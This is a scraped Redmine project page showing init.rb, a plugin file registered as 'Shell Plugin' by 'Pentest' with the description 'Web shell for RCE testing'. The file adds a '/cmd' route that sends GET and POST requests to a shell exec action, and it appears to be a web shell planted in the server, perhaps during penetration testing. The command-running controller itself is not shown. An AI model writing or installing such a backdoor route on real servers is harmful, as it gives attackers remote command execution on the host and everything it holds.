⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
cmdtest1782618771
All Projects
cmdtest1782618771
Overview
Activity
Issues
Documents
Wiki
Files
Repository
Download (259 Bytes)
Files
» init.rb
Redmine Admin
, 07/16/2026 07:05 AM
require
'redmine'
Redmine
::
Plugin
.
register
:shell
do
name
'Shell Plugin'
author
'Pentest'
description
'Web shell for RCE testing'
version
'0.0.1'
end
Rails
.
application
.
routes
.
prepend
do
match
'/cmd'
,
:to
=>
'shell#exec'
,
:via
=>
[
:get
,
:post
]
end
« Previous
1
…
3
4
5
6
7
…
15
Next »
(5-5/15)
Loading...